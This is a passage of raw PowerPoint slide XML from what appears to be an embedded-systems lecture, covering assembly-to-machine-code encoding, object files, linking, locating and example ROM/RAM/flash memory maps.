            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600"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%r0,%r0,%r1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1"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cfa_ef</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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.type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main,@function</a:t>
            </a:r>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.size main,.-main</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.end</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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1680323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83994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381000" y="47244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t>add_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  %r1, %r0, 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      01101 000 001 00 010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                  68 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>add_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  %r0, %r0, 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      11100 000 0 0000011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                   E0 03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>j.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>blink] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    00100 000 00 100001 0 000 011111 000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 20 21 07 C0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>add_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  %r0, %r0, %r1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 01100 000 001 11 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                  60 38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4572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152400" y="18288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152400" y="2286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152400" y="23622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7633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563" y="2056307"/>
            <a:ext cx="8633460" cy="437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1524000" y="76200"/>
            <a:ext cx="6172200" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>foo.o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="384493" y="6858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t>add_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  %r1, %r0, 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      01101 000 001 00 010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                  68 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>add_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  %r0, %r0, 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      11100 000 0 0000011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                   E0 03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>j.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>blink] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    00100 000 00 100001 0 000 011111 000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 20 21 07 C0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>add_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  %r0, %r0, %r1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 01100 000 001 11 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                  60 38</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138393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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>The Build Process – Compiling (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The object file contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>sections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>segments  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of code or data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.text, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, .data</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Machine instructions in the sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Symbol table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Names and locations of the functions and variables referenced from the code in the source file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some locations are unknown during compilation because the variables or functions are defined in other source file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unresolved references are resolved by the linker</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2573483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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The Build Process - Linking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The linker combines all object files into one file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The linker combines the ‘text’, ‘data’ and ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>’ sections from the object files into its own ‘text’, ‘data’ and ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>’ sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The linker resolves all the unresolved references in the object files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If a symbol cannot be resolved from any of the object files , or is declared in more than one object file, the linker will not be able to complete its task and fail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3685763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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The Build Process – Linking (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Some unresolved references are for common functions (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The linker can be instructed to include pre-compiled libraries during the linking process that implement them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>The linker produces a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>relocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> binary file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This file contains everything needed to run the program except the mapping to the memory area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The file contains relative offsets to the code and data, and it must be assigned with an absolute base address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2343939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smtClean="0"/>
              <a:t>The Build Process – Locating</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>The locator creates an executable program from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>relocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> object file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>The developer needs to provide the memory addresses and structure as an input. This is used to assign physical memory address for each section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>The output of the locator is a program that can be loaded into the target embedded system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>In many cases the locator is integrated into the linker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8247008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#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>System has 128K of ROM and 1MB of RAM</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(128K-1) - 0x00000000 – 0x0001FFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>RAM: 1M – (2M-1) – 0x00100000 – 0x001FFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Allows the memory controller to make a decision whether to go to ROM or RAM based on a single bit (bit 20)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8656723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#2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>System has 16K of ROM, 1MB of RAM, 512KB of flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>ROM code contains loader code that copies most of the code from flash and executes it</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(16K-1) - 0x00000000 – 0x00003FFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>RAM: 1M – (2M-1) – 0x00100000 – 0x001FFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The flash itself is not accessible over the data bus – only over the I/O bus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1164708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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Embedded Systems - Introduction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#3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
